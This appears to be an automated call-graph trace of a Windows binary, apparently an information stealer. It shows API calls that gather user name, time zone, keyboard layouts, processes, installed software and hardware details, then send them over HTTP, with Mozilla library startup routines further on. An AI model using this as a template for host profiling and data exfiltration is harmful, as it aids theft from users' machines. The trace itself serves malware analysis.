93112 40e64d lstrcpyA 93111->93112 93113 405ca5 93112->93113 93114 405cb5 InternetConnectA 93113->93114 93114->93072 93115 405cdf HttpOpenRequestA 93114->93115 93116 406125 InternetCloseHandle 93115->93116 93117 405d17 93115->93117 93116->93072 93118 405d33 93117->93118 93119 405d1d InternetSetOptionA 93117->93119 93120 40e6e6 3 API calls 93118->93120 93119->93118 93121 405d40 93120->93121 93122 40e64d lstrcpyA 93121->93122 93123 405d49 93122->93123 93124 40e694 2 API calls 93123->93124 93125 405d61 93124->93125 93126 40e64d lstrcpyA 93125->93126 93127 405d6a 93126->93127 93128 40e6e6 3 API calls 93127->93128 93129 405d7f 93128->93129 93130 40e64d lstrcpyA 93129->93130 93131 405d88 93130->93131 93132 40e6e6 3 API calls 93131->93132 93133 405da2 93132->93133 93134 40e64d lstrcpyA 93133->93134 93135 405dab 93134->93135 93136 40e6e6 3 API calls 93135->93136 93137 405dc5 93136->93137 93138 40e64d lstrcpyA 93137->93138 93139 405dce 93138->93139 93140 40e6e6 3 API calls 93139->93140 93141 405de8 93140->93141 93142 40e64d lstrcpyA 93141->93142 93143 405df1 93142->93143 93144 40e694 2 API calls 93143->93144 93145 405e09 93144->93145 93146 40e64d lstrcpyA 93145->93146 93147 405e12 93146->93147 93148 40e6e6 3 API calls 93147->93148 93149 405e27 93148->93149 93150 40e64d lstrcpyA 93149->93150 93151 405e30 93150->93151 93152 40e6e6 3 API calls 93151->93152 93153 405e45 93152->93153 93154 40e64d lstrcpyA 93153->93154 93155 405e4e 93154->93155 93156 40e694 2 API calls 93155->93156 93157 405e66 93156->93157 93158 40e64d lstrcpyA 93157->93158 93159 405e6f 93158->93159 93160 40e6e6 3 API calls 93159->93160 93161 405e84 93160->93161 93162 40e64d lstrcpyA 93161->93162 93163 405e8d 93162->93163 93164 40e6e6 3 API calls 93163->93164 93165 405ea7 93164->93165 93166 40e64d lstrcpyA 93165->93166 93167 405eb0 93166->93167 93168 40e6e6 3 API calls 93167->93168 93169 405ec9 93168->93169 93170 40e64d lstrcpyA 93169->93170 93171 405ed2 93170->93171 93172 40e6e6 3 API calls 93171->93172 93173 405ee7 93172->93173 93174 40e64d lstrcpyA 93173->93174 93175 405ef0 93174->93175 93176 40e6e6 3 API calls 93175->93176 93177 405f0a 93176->93177 93178 40e64d lstrcpyA 93177->93178 93179 405f13 93178->93179 93180 40e6e6 3 API calls 93179->93180 93181 405f28 93180->93181 93182 40e64d lstrcpyA 93181->93182 93183 405f31 93182->93183 93184 40e6e6 3 API calls 93183->93184 93185 405f46 93184->93185 93186 40e64d lstrcpyA 93185->93186 93187 405f4f 93186->93187 93188 40e694 2 API calls 93187->93188 93189 405f67 93188->93189 93190 40e64d lstrcpyA 93189->93190 93191 405f70 93190->93191 93192 40e6e6 3 API calls 93191->93192 93193 405f85 93192->93193 93194 40e64d lstrcpyA 93193->93194 93195 405f8e 93194->93195 93196 40e6e6 3 API calls 93195->93196 93197 405fa8 93196->93197 93198 40e64d lstrcpyA 93197->93198 93199 405fb1 93198->93199 93200 40e6e6 3 API calls 93199->93200 93201 405fca 93200->93201 93202 40e64d lstrcpyA 93201->93202 93203 405fd3 93202->93203 93204 40e6e6 3 API calls 93203->93204 93205 405fe8 93204->93205 93206 40e64d lstrcpyA 93205->93206 93207 405ff1 93206->93207 93208 40e694 2 API calls 93207->93208 93209 406009 93208->93209 93210 40e64d lstrcpyA 93209->93210 93211 406012 93210->93211 93212 406022 lstrlenA 93211->93212 94179 40e778 93212->94179 93214 406033 lstrlenA GetProcessHeap HeapAlloc 94180 40e778 93214->94180 93216 406056 lstrlenA 94181 40e778 93216->94181 93218 406066 memcpy 94182 40e778 93218->94182 93220 406078 lstrlenA 93221 406088 93220->93221 93222 406091 lstrlenA memcpy 93221->93222 94183 40e778 93222->94183 93224 4060ad lstrlenA 94184 40e778 93224->94184 93226 4060bd HttpSendRequestA 93227 406102 InternetReadFile 93226->93227 93228 406119 InternetCloseHandle 93227->93228 93230 4060cf 93227->93230 93228->93116 93229 40e6e6 3 API calls 93229->93230 93230->93227 93230->93228 93230->93229 93231 40e64d lstrcpyA 93230->93231 93231->93230 94190 40e778 93232->94190 93234 41075c strtok_s 93235 4107c5 93234->93235 93236 410769 93234->93236 93235->91895 93237 4107ae strtok_s 93236->93237 93238 40e603 2 API calls 93236->93238 93239 40e603 2 API calls 93236->93239 93237->93235 93237->93236 93238->93237 93239->93236 94191 40e778 93240->94191 93242 41056b strtok_s 93243 41067c 93242->93243 93245 41057c 93242->93245 93243->91908 93244 41062d StrCmpCA 93244->93245 93245->93244 93246 40e603 2 API calls 93245->93246 93247 41065f strtok_s 93245->93247 93248 4105fc StrCmpCA 93245->93248 93249 4105d7 StrCmpCA 93245->93249 93250 4105a9 StrCmpCA 93245->93250 93246->93247 93247->93243 93247->93245 93248->93245 93249->93245 93250->93245 94192 40e778 93251->94192 93253 4106a9 strtok_s 93257 41072f 93253->93257 93259 4106b6 93253->93259 93254 40e603 2 API calls 93256 410718 strtok_s 93254->93256 93255 4106e0 StrCmpCA 93255->93259 93256->93257 93256->93259 93257->91921 93258 40e603 2 API calls 93258->93259 93259->93254 93259->93255 93259->93256 93259->93258 93261 40e58f lstrcpyA 93260->93261 93262 412b0d 93261->93262 93263 40e6e6 3 API calls 93262->93263 93264 412b1e 93263->93264 93265 40e64d lstrcpyA 93264->93265 93266 412b27 93265->93266 93267 40e6e6 3 API calls 93266->93267 93268 412b41 93267->93268 93269 40e64d lstrcpyA 93268->93269 93270 412b4a 93269->93270 93271 40e6e6 3 API calls 93270->93271 93272 412b64 93271->93272 93273 40e64d lstrcpyA 93272->93273 93274 412b6d 93273->93274 93275 40e6e6 3 API calls 93274->93275 93276 412b82 93275->93276 93277 40e64d lstrcpyA 93276->93277 93278 412b8b 93277->93278 93279 40e6e6 3 API calls 93278->93279 93280 412ba4 93279->93280 93281 40e64d lstrcpyA 93280->93281 93282 412bad 93281->93282 94193 40e863 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 93282->94193 93284 412bba 93285 40e6e6 3 API calls 93284->93285 93286 412bc7 93285->93286 93287 40e64d lstrcpyA 93286->93287 93288 412bd0 93287->93288 93289 40e6e6 3 API calls 93288->93289 93290 412be5 93289->93290 93291 40e64d lstrcpyA 93290->93291 93292 412bee 93291->93292 93293 40e6e6 3 API calls 93292->93293 93294 412c07 93293->93294 93295 40e64d lstrcpyA 93294->93295 93296 412c10 93295->93296 94194 40ef3f memset RegOpenKeyExA 93296->94194 93298 412c1d 93299 40e6e6 3 API calls 93298->93299 93300 412c2a 93299->93300 93301 40e64d lstrcpyA 93300->93301 93302 412c33 93301->93302 93303 40e6e6 3 API calls 93302->93303 93304 412c48 93303->93304 93305 40e64d lstrcpyA 93304->93305 93306 412c51 93305->93306 93307 40e6e6 3 API calls 93306->93307 93308 412c6a 93307->93308 93309 40e64d lstrcpyA 93308->93309 93310 412c73 93309->93310 93311 40efcc 7 API calls 93310->93311 93312 412c84 93311->93312 93313 40e694 2 API calls 93312->93313 93314 412c92 93313->93314 93315 40e64d lstrcpyA 93314->93315 93316 412c9b 93315->93316 93317 40e6e6 3 API calls 93316->93317 93318 412cb8 93317->93318 93319 40e64d lstrcpyA 93318->93319 93320 412cc1 93319->93320 93321 40e6e6 3 API calls 93320->93321 93322 412cda 93321->93322 93323 40e64d lstrcpyA 93322->93323 93324 412ce3 93323->93324 93325 40f08a 15 API calls 93324->93325 93326 412cf4 93325->93326 93327 40e694 2 API calls 93326->93327 93328 412d02 93327->93328 93329 40e64d lstrcpyA 93328->93329 93330 412d0b 93329->93330 93331 40e6e6 3 API calls 93330->93331 93332 412d2d 93331->93332 93333 40e64d lstrcpyA 93332->93333 93334 412d36 93333->93334 93335 40e6e6 3 API calls 93334->93335 93336 412d4f 93335->93336 93337 40e64d lstrcpyA 93336->93337 93338 412d58 93337->93338 93339 412d60 GetCurrentProcessId 93338->93339 94198 40fb2a OpenProcess 93339->94198 93342 40e694 2 API calls 93343 412d7f 93342->93343 93344 40e64d lstrcpyA 93343->93344 93345 412d88 93344->93345 93346 40e6e6 3 API calls 93345->93346 93347 412da5 93346->93347 93348 40e64d lstrcpyA 93347->93348 93349 412dae 93348->93349 93350 40e6e6 3 API calls 93349->93350 93351 412dc7 93350->93351 93352 40e64d lstrcpyA 93351->93352 93353 412dd0 93352->93353 93354 40e6e6 3 API calls 93353->93354 93355 412de5 93354->93355 93356 40e64d lstrcpyA 93355->93356 93357 412dee 93356->93357 93358 40e6e6 3 API calls 93357->93358 93359 412e07 93358->93359 93360 40e64d lstrcpyA 93359->93360 93361 412e10 93360->93361 94203 40f1d0 GetProcessHeap HeapAlloc 93361->94203 93364 40e6e6 3 API calls 93365 412e2a 93364->93365 93366 40e64d lstrcpyA 93365->93366 93367 412e33 93366->93367 93368 40e6e6 3 API calls 93367->93368 93369 412e48 93368->93369 93370 40e64d lstrcpyA 93369->93370 93371 412e51 93370->93371 93372 40e6e6 3 API calls 93371->93372 93373 412e6a 93372->93373 93374 40e64d lstrcpyA 93373->93374 93375 412e73 93374->93375 94209 40f311 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 93375->94209 93378 40e694 2 API calls 93379 412e92 93378->93379 93380 40e64d lstrcpyA 93379->93380 93381 412e9b 93380->93381 93382 40e6e6 3 API calls 93381->93382 93383 412eb8 93382->93383 93384 40e64d lstrcpyA 93383->93384 93385 412ec1 93384->93385 93386 40e6e6 3 API calls 93385->93386 93387 412eda 93386->93387 93388 40e64d lstrcpyA 93387->93388 93389 412ee3 93388->93389 94222 40f4a5 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 93389->94222 93392 40e694 2 API calls 93393 412f02 93392->93393 93394 40e64d lstrcpyA 93393->93394 93395 412f0b 93394->93395 93396 40e6e6 3 API calls 93395->93396 93397 412f28 93396->93397 93398 40e64d lstrcpyA 93397->93398 93399 412f31 93398->93399 93400 40e6e6 3 API calls 93399->93400 93401 412f4a 93400->93401 93402 40e64d lstrcpyA 93401->93402 93403 412f53 93402->93403 93404 40e828 3 API calls 93403->93404 93405 412f60 93404->93405 93406 40e6e6 3 API calls 93405->93406 93407 412f6d 93406->93407 93408 40e64d lstrcpyA 93407->93408 93409 412f76 93408->93409 93410 40e6e6 3 API calls 93409->93410 93411 412f8b 93410->93411 93412 40e64d lstrcpyA 93411->93412 93413 412f94 93412->93413 93414 40e6e6 3 API calls 93413->93414 93415 412fad 93414->93415 93416 40e64d lstrcpyA 93415->93416 93417 412fb6 93416->93417 94235 40e7f6 GetProcessHeap HeapAlloc GetUserNameA 93417->94235 93419 412fc3 93420 40e6e6 3 API calls 93419->93420 93421 412fd0 93420->93421 93422 40e64d lstrcpyA 93421->93422 93423 412fd9 93422->93423 93424 40e6e6 3 API calls 93423->93424 93425 412fee 93424->93425 93426 40e64d lstrcpyA 93425->93426 93427 412ff7 93426->93427 93428 40e6e6 3 API calls 93427->93428 93429 413010 93428->93429 93430 40e64d lstrcpyA 93429->93430 93431 413019 93430->93431 94236 40eecd 7 API calls 93431->94236 93434 40e694 2 API calls 93435 413038 93434->93435 93436 40e64d lstrcpyA 93435->93436 93437 413041 93436->93437 93438 40e6e6 3 API calls 93437->93438 93439 41305e 93438->93439 93440 40e64d lstrcpyA 93439->93440 93441 413067 93440->93441 93442 40e6e6 3 API calls 93441->93442 93443 413080 93442->93443 93444 40e64d lstrcpyA 93443->93444 93445 413089 93444->93445 94239 40e910 93445->94239 93448 40e694 2 API calls 93449 4130a8 93448->93449 93450 40e64d lstrcpyA 93449->93450 93451 4130b1 93450->93451 93452 40e6e6 3 API calls 93451->93452 93453 4130ce 93452->93453 93454 40e64d lstrcpyA 93453->93454 93455 4130d7 93454->93455 93456 40e6e6 3 API calls 93455->93456 93457 4130f0 93456->93457 93458 40e64d lstrcpyA 93457->93458 93459 4130f9 93458->93459 94249 40e863 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 93459->94249 93461 413106 93462 40e6e6 3 API calls 93461->93462 93463 413113 93462->93463 93464 40e64d lstrcpyA 93463->93464 93465 41311c 93464->93465 93466 40e6e6 3 API calls 93465->93466 93467 413131 93466->93467 93468 40e64d lstrcpyA 93467->93468 93469 41313a 93468->93469 93470 40e6e6 3 API calls 93469->93470 93471 413153 93470->93471 93472 40e64d lstrcpyA 93471->93472 93473 41315c 93472->93473 94250 40e8bd GetProcessHeap HeapAlloc GetTimeZoneInformation 93473->94250 93476 40e6e6 3 API calls 93477 413176 93476->93477 93478 40e64d lstrcpyA 93477->93478 93479 41317f 93478->93479 93480 40e6e6 3 API calls 93479->93480 93481 413194 93480->93481 93482 40e64d lstrcpyA 93481->93482 93483 41319d 93482->93483 93484 40e6e6 3 API calls 93483->93484 93485 4131b6 93484->93485 93486 40e64d lstrcpyA 93485->93486 93487 4131bf 93486->93487 93488 40e6e6 3 API calls 93487->93488 93489 4131d8 93488->93489 93490 40e64d lstrcpyA 93489->93490 93491 4131e1 93490->93491 94253 40e9fb GetProcessHeap HeapAlloc RegOpenKeyExA 93491->94253 93494 40e6e6 3 API calls 93495 4131fb 93494->93495 93496 40e64d lstrcpyA 93495->93496 93497 413204 93496->93497 93498 40e6e6 3 API calls 93497->93498 93499 413219 93498->93499 93500 40e64d lstrcpyA 93499->93500 93501 413222 93500->93501 93502 40e6e6 3 API calls 93501->93502 93503 41323b 93502->93503 93504 40e64d lstrcpyA 93503->93504 93505 413244 93504->93505 94256 40ea97 93505->94256 93508 40e6e6 3 API calls 93509 41325e 93508->93509 93510 40e64d lstrcpyA 93509->93510 93511 413267 93510->93511 93512 40e6e6 3 API calls 93511->93512 93513 41327c 93512->93513 93514 40e64d lstrcpyA 93513->93514 93515 413285 93514->93515 93516 40e6e6 3 API calls 93515->93516 93517 41329e 93516->93517 93518 40e64d lstrcpyA 93517->93518 93519 4132a7 93518->93519 94270 40ea64 GetSystemInfo wsprintfA 93519->94270 93521 4132b4 93522 40e6e6 3 API calls 93521->93522 93523 4132c1 93522->93523 93524 40e64d lstrcpyA 93523->93524 93525 4132ca 93524->93525 93526 40e6e6 3 API calls 93525->93526 93527 4132df 93526->93527 93528 40e64d lstrcpyA 93527->93528 93529 4132e8 93528->93529 93530 40e6e6 3 API calls 93529->93530 93531 413301 93530->93531 93532 40e64d lstrcpyA 93531->93532 93533 41330a 93532->93533 94271 40eb56 GetProcessHeap HeapAlloc 93533->94271 93535 413317 93536 40e6e6 3 API calls 93535->93536 93537 413324 93536->93537 93538 40e64d lstrcpyA 93537->93538 93539 41332d 93538->93539 93540 40e6e6 3 API calls 93539->93540 93541 413342 93540->93541 93542 40e64d lstrcpyA 93541->93542 93543 41334b 93542->93543 93544 40e6e6 3 API calls 93543->93544 93545 413364 93544->93545 93546 40e64d lstrcpyA 93545->93546 93547 41336d 93546->93547 94276 40ebbf 93547->94276 93550 40e694 2 API calls 93551 41338c 93550->93551 93552 40e64d lstrcpyA 93551->93552 93553 413395 93552->93553 93554 40e6e6 3 API calls 93553->93554 93555 4133b2 93554->93555 93556 40e64d lstrcpyA 93555->93556 93557 4133bb 93556->93557 93558 40e6e6 3 API calls 93557->93558 93559 4133d4 93558->93559 93560 40e64d lstrcpyA 93559->93560 93561 4133dd 93560->93561 94282 40ee28 93561->94282 93563 4133ee 93564 40e694 2 API calls 93563->93564 93565 4133fc 93564->93565 93566 40e64d lstrcpyA 93565->93566 93567 413405 93566->93567 93568 40e6e6 3 API calls 93567->93568 93569 413422 93568->93569 93570 40e64d lstrcpyA 93569->93570 93571 41342b 93570->93571 93572 40e6e6 3 API calls 93571->93572 93573 413444 93572->93573 93574 40e64d lstrcpyA 93573->93574 93575 41344d 93574->93575 94290 40ec1e 93575->94290 93577 413463 93578 40e694 2 API calls 93577->93578 93579 413472 93578->93579 93580 40e64d lstrcpyA 93579->93580 93581 41347b 93580->93581 93582 40ec1e 13 API calls 93581->93582 93583 413499 93582->93583 93584 40e694 2 API calls 93583->93584 93585 4134a8 93584->93585 93586 40e64d lstrcpyA 93585->93586 93587 4134b1 93586->93587 93588 40e6e6 3 API calls 93587->93588 93589 4134ce 93588->93589 93590 40e64d lstrcpyA 93589->93590 93591 4134d7 93590->93591 93592 4134e7 lstrlenA 93591->93592 93593 4134f7 93592->93593 93594 40e58f lstrcpyA 93593->93594 93595 413507 93594->93595 93596 401324 lstrcpyA 93595->93596 93597 413515 93596->93597 94306 41296a 93597->94306 94112 4192c3 _MSFOpenExW 94111->94112 94113 4192d2 94112->94113 94128 4183c3 lstrlenA lstrcpyA _MSFOpenExW 94112->94128 94117 418458 94113->94117 94116 4192e8 _MSFOpenExW moneypunct 94116->92760 94118 41846b 94117->94118 94124 4184c7 94117->94124 94119 4184ce 94118->94119 94120 41849e SetFilePointer 94118->94120 94118->94124 94121 4184d4 CreateFileA 94119->94121 94122 41850e 94119->94122 94120->94124 94123 4184f4 94121->94123 94122->94124 94125 418538 CreateFileMappingA 94122->94125 94123->94124 94124->94116 94125->94124 94126 418554 MapViewOfFile 94125->94126 94126->94124 94127 41856a CloseHandle 94126->94127 94127->94124 94128->94113 94130 40e5c6 lstrcpyA 94129->94130 94131 4118b1 94130->94131 94132 40e5c6 lstrcpyA 94131->94132 94133 4118bd 94132->94133 94134 40e5c6 lstrcpyA 94133->94134 94135 4118c9 94134->94135 94135->92862 94136->92814 94137->92859 94138->92835 94140 40e58f lstrcpyA 94139->94140 94141 4020c7 94140->94141 94141->92849 94142->92834 94143->92835 94144->92818 94145->92835 94146->92835 94148 40f078 94147->94148 94149 40efea 94147->94149 94150 40e58f lstrcpyA 94148->94150 94151 40e58f lstrcpyA 94149->94151 94153 40f085 94150->94153 94152 40eff9 memset 94151->94152 94154 40f01b 94152->94154 94153->92890 94164 40fc61 lstrcpyA malloc strncpy 94154->94164 94156 40f025 94157 40f02f lstrcatA 94156->94157 94165 40e5fa 94157->94165 94159 40f045 lstrcatA 94160 40f05f 94159->94160 94161 40e58f lstrcpyA 94160->94161 94162 40f06e 94161->94162 94162->94153 94163->92894 94164->94156 94166 40e601 94165->94166 94166->94159 94168 403f16 94167->94168 94168->94168 94169 403f1d ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 94168->94169 94176 40e778 94169->94176 94171 403f5f lstrlenA 94177 40e778 94171->94177 94173 403f6f InternetCrackUrlA 94174 403f89 94173->94174 94174->92903 94175->93028 94176->94171 94177->94173 94178->93037 94179->93214 94180->93216 94181->93218 94182->93220 94183->93224 94184->93226 94186 406a7d LocalAlloc 94185->94186 94187 40614f 94185->94187 94186->94187 94188 406a8d CryptStringToBinaryA 94186->94188 94187->93081 94187->93094 94188->94187 94189 406aa4 LocalFree 94188->94189 94189->94187 94190->93234 94191->93242 94192->93253 94193->93284 94195 40efa6 CharToOemA 94194->94195 94196 40ef8b RegQueryValueExA 94194->94196 94195->93298 94196->94195 94199 40fb66 94198->94199 94200 40fb4a K32GetModuleFileNameExA CloseHandle 94198->94200 94201 40e58f lstrcpyA 94199->94201 94200->94199 94202 40fb75 94201->94202 94202->93342 94323 40e7e8 94203->94323 94206 40f203 RegOpenKeyExA 94207 40f223 RegQueryValueExA 94206->94207 94208 40f1fc 94206->94208 94207->94208 94208->93364 94210 40f377 94209->94210 94211 40f37f CoSetProxyBlanket 94210->94211 94214 40f478 94210->94214 94215 40f3af 94211->94215 94212 40e58f lstrcpyA 94213 40f489 94212->94213 94213->93378 94214->94212 94215->94214 94216 40f3e3 VariantInit 94215->94216 94217 40f402 94216->94217 94329 40f249 _EH_prolog CoCreateInstance 94217->94329 94219 40f410 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 94220 40e58f lstrcpyA 94219->94220 94221 40f46c VariantClear 94220->94221 94221->94213 94223 40f50b 94222->94223 94224 40f513 CoSetProxyBlanket 94223->94224 94228 40f5a8 94223->94228 94227 40f543 94224->94227 94225 40e58f lstrcpyA 94226 40f5b9 94225->94226 94226->93392 94227->94228 94229 40f56b VariantInit 94227->94229 94228->94225 94230 40f58a 94229->94230 94335 40f7cd LocalAlloc CharToOemW 94230->94335 94232 40f592 94233 40e58f lstrcpyA 94232->94233 94234 40f59c VariantClear 94233->94234 94234->94226 94235->93419 94237 40e58f lstrcpyA 94236->94237 94238 40ef37 94237->94238 94238->93434 94240 40e58f lstrcpyA 94239->94240 94241 40e929 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 94240->94241 94242 40e9e8 94241->94242 94247 40e959 94241->94247 94244 40e9f3 94242->94244 94245 40e9ec LocalFree 94242->94245 94243 40e95e GetLocaleInfoA 94243->94247 94244->93448 94245->94244 94246 40e6e6 lstrlenA lstrcpyA lstrcatA 94246->94247 94247->94242 94247->94243 94247->94246 94248 40e64d lstrcpyA 94247->94248 94248->94247 94249->93461 94251 40e90b 94250->94251 94252 40e8ef wsprintfA 94250->94252 94251->93476 94252->94251 94254 40ea56 94253->94254 94255 40ea3e RegQueryValueExA 94253->94255 94254->93494 94255->94254 94257 40eae9 GetLogicalProcessorInformationEx 94256->94257 94258 40eaf4 94257->94258 94259 40eabf GetLastError 94257->94259 94338 40f645 GetProcessHeap HeapFree 94258->94338 94260 40eb41 94259->94260 94261 40eaca 94259->94261 94266 40eb4b 94260->94266 94339 40f645 GetProcessHeap HeapFree 94260->94339 94269 40eace 94261->94269 94266->93508 94267 40eb1b 94267->94266 94268 40eb21 wsprintfA 94267->94268 94268->94266 94269->94257 94269->94266 94336 40f645 GetProcessHeap HeapFree 94269->94336 94337 40f662 GetProcessHeap HeapAlloc 94269->94337 94270->93521 94340 40f60e 94271->94340 94274 40eb96 wsprintfA 94274->93535 94277 40e58f lstrcpyA 94276->94277 94281 40ebd6 94277->94281 94278 40ec02 EnumDisplayDevicesA 94279 40ec18 94278->94279 94278->94281 94279->93550 94280 40e603 2 API calls 94280->94281 94281->94278 94281->94279 94281->94280 94283 40e58f lstrcpyA 94282->94283 94284 40ee42 CreateToolhelp32Snapshot Process32First 94283->94284 94285 40eec0 CloseHandle 94284->94285 94289 40ee6a 94284->94289 94285->93563 94286 40eeae Process32Next 94286->94285 94286->94289 94287 40e6e6 lstrlenA lstrcpyA lstrcatA 94287->94289 94288 40e64d lstrcpyA 94288->94289 94289->94286 94289->94287 94289->94288 94291 40e58f lstrcpyA 94290->94291 94292 40ec36 RegOpenKeyExA 94291->94292 94293 40ec66 94292->94293 94294 40ec7f 94292->94294 94295 40e5c6 lstrcpyA 94293->94295 94296 40ec88 RegEnumKeyExA 94294->94296 94298 40edf8 94294->94298 94303 40ed77 RegQueryValueExA 94294->94303 94304 40e64d lstrcpyA 94294->94304 94305 40e6e6 lstrlenA lstrcpyA lstrcatA 94294->94305 94301 40ec72 94295->94301 94296->94294 94297 40ecb1 wsprintfA RegOpenKeyExA 94296->94297 94297->94298 94299 40ecf1 RegQueryValueExA 94297->94299 94302 40e5c6 lstrcpyA 94298->94302 94299->94294 94300 40ed1b lstrlenA 94299->94300 94300->94294 94301->93577 94302->94301 94303->94294 94304->94294 94305->94294 94307 412978 94306->94307 94308 40e64d lstrcpyA 94307->94308 94309 412999 94308->94309 94310 40e64d lstrcpyA 94309->94310 94311 4129bf 94310->94311 94312 40e64d lstrcpyA 94311->94312 94313 4129cb 94312->94313 94314 40e64d lstrcpyA 94313->94314 94315 4129d7 94314->94315 94316 4129de Sleep 94315->94316 94319 4129ee 94315->94319 94316->94315 94317 412a1a CreateThread WaitForSingleObject 94318 40e58f lstrcpyA 94317->94318 94343 4118d1 _EH_prolog 94317->94343 94319->94317 94342 41a321 52 API calls _MSFOpenExW 94319->94342 94322 412a17 94322->94317 94326 40e77b GetProcessHeap HeapAlloc RegOpenKeyExA 94323->94326 94325 40e7ed 94325->94206 94325->94208 94327 40e7be RegQueryValueExA 94326->94327 94328 40e7d5 94326->94328 94327->94328 94328->94325 94330 40f282 SysAllocString 94329->94330 94331 40f2e8 94329->94331 94330->94331 94333 40f291 94330->94333 94331->94219 94332 40f2e1 SysFreeString 94332->94331 94333->94332 94334 40f2bd _wtoi64 SysFreeString 94333->94334 94334->94332 94335->94232 94336->94269 94337->94269 94338->94267 94339->94266 94341 40eb80 GlobalMemoryStatusEx 94340->94341 94341->94274 94342->94322 96215 6c0fb8ae 96216 6c0fb8ba ___scrt_is_nonwritable_in_current_image 96215->96216 96217 6c0fb8e3 dllmain_raw 96216->96217 96218 6c0fb8de 96216->96218 96227 6c0fb8c9 96216->96227 96219 6c0fb8fd dllmain_crt_dispatch 96217->96219 96217->96227 96228 6c0dbed0 DisableThreadLibraryCalls LoadLibraryExW 96218->96228 96219->96218 96219->96227 96221 6c0fb91e 96222 6c0fb94a 96221->96222 96229 6c0dbed0 DisableThreadLibraryCalls LoadLibraryExW 96221->96229 96223 6c0fb953 dllmain_crt_dispatch 96222->96223 96222->96227 96225 6c0fb966 dllmain_raw 96223->96225 96223->96227 96225->96227 96226 6c0fb936 dllmain_crt_dispatch dllmain_raw 96226->96222 96228->96221 96229->96226 96230 6c0fb694 96231 6c0fb6a0 ___scrt_is_nonwritable_in_current_image 96230->96231 96260 6c0faf2a 96231->96260 96233 6c0fb6a7 96234 6c0fb796 96233->96234 96235 6c0fb6d1 96233->96235 96238 6c0fb6ac ___scrt_is_nonwritable_in_current_image 96233->96238 96277 6c0fb1f7 IsProcessorFeaturePresent 96234->96277 96264 6c0fb064 96235->96264 96239 6c0fb6e0 __RTC_Initialize 96239->96238 96267 6c0fbf89 InitializeSListHead 96239->96267 96241 6c0fb6ee ___scrt_initialize_default_local_stdio_options 96243 6c0fb6f3 _initterm_e 96241->96243 96242 6c0fb79d ___scrt_is_nonwritable_in_current_image 96244 6c0fb828 96242->96244 96245 6c0fb7d2 96242->96245 96259 6c0fb7b3 ___scrt_uninitialize_crt __RTC_Initialize 96242->96259 96243->96238 96246 6c0fb708 96243->96246 96247 6c0fb1f7 ___scrt_fastfail 6 API calls 96244->96247 96281 6c0fb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 96245->96281 96268 6c0fb072 96246->96268 96253 6c0fb82f 96247->96253 96250 6c0fb7d7 96282 6c0fbf95 __std_type_info_destroy_list 96250->96282 96252 6c0fb70d 96252->96238 96256 6c0fb711 _initterm 96252->96256 96254 6c0fb86e dllmain_crt_process_detach 96253->96254 96255 6c0fb83b 96253->96255 96258 6c0fb840 96254->96258 96257 6c0fb860 dllmain_crt_process_attach 96255->96257 96255->96258 96256->96238 96257->96258 96261 6c0faf33 96260->96261 96283 6c0fb341 IsProcessorFeaturePresent 96261->96283 96263 6c0faf3f ___scrt_uninitialize_crt 96263->96233 96284 6c0faf8b 96264->96284 96266 6c0fb06b 96266->96239 96267->96241 96269 6c0fb077 ___scrt_release_startup_lock 96268->96269 96270 6c0fb07b 96269->96270 96271 6c0fb082 96269->96271 96294 6c0fb341 IsProcessorFeaturePresent 96270->96294 96274 6c0fb087 _configure_narrow_argv 96271->96274 96273 6c0fb080 96273->96252 96275 6c0fb095 _initialize_narrow_environment 96274->96275 96276 6c0fb092 96274->96276 96275->96273 96276->96252 96278 6c0fb20c ___scrt_fastfail 96277->96278 96279 6c0fb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 96278->96279 96280 6c0fb302 ___scrt_fastfail 96279->96280 96280->96242 96281->96250 96282->96259 96283->96263 96285 6c0faf9e 96284->96285 96286 6c0faf9a 96284->96286 96287 6c0fb028 96285->96287 96290 6c0fafab ___scrt_release_startup_lock 96285->96290 96286->96266 96288 6c0fb1f7 ___scrt_fastfail 6 API calls 96287->96288 96289 6c0fb02f 96288->96289 96291 6c0fafb8 _initialize_onexit_table 96290->96291 96293 6c0fafd6 96290->96293 96292 6c0fafc7 _initialize_onexit_table 96291->96292 96291->96293 96292->96293 96293->96266 96294->96273 96295 6c0c3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 96300 6c0fab2a 96295->96300 96299 6c0c30db 96304 6c0fae0c _crt_atexit _register_onexit_function 96300->96304 96302 6c0c30cd 96303 6c0fb320 5 API calls ___raise_securityfailure 96302->96303 96303->96299 96304->96302 96305 6c0c35a0 96306 6c0c35c4 InitializeCriticalSectionAndSpinCount getenv 96305->96306 96321 6c0c3846 __aulldiv 96305->96321 96307 6c0c38fc strcmp 96306->96307 96320 6c0c35f3 __aulldiv 96306->96320 96309 6c0c3912 strcmp 96307->96309 96307->96320 96309->96320 96310 6c0c35f8 QueryPerformanceFrequency 96310->96320 96311 6c0c38f4 96312 6c0c3622 _strnicmp 96314 6c0c3944 _strnicmp 96312->96314 96312->96320 96313 6c0c376a QueryPerformanceCounter EnterCriticalSection 96315 6c0c37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 96313->96315 96319 6c0c375c 96313->96319 96316 6c0c395d 96314->96316 96314->96320 96318 6c0c37fc LeaveCriticalSection 96315->96318 96315->96319 96317 6c0c3664 GetSystemTimeAdjustment 96317->96320 96318->96319 96318->96321 96319->96313 96319->96315 96319->96318 96319->96321 96320->96310 96320->96312 96320->96314 96320->96316 96320->96317 96320->96319 96322 6c0fb320 5 API calls ___raise_securityfailure 96321->96322 96322->96311 96323 6c0dc930 GetSystemInfo VirtualAlloc 96324 6c0dc9a3 GetSystemInfo 96323->96324 96331 6c0dc973 96323->96331 96326 6c0dc9b6 96324->96326 96327 6c0dc9d0 96324->96327 96326->96327 96329 6c0dc9bd 96326->96329 96330 6c0dc9d8 VirtualAlloc 96327->96330 96327->96331 96328 6c0dc99b 96329->96331 96332 6c0dc9c1 VirtualFree 96329->96332 96333 6c0dc9ec 96330->96333 96334 6c0dc9f0 96330->96334 96339 6c0fb320 5 API calls ___raise_securityfailure 96331->96339 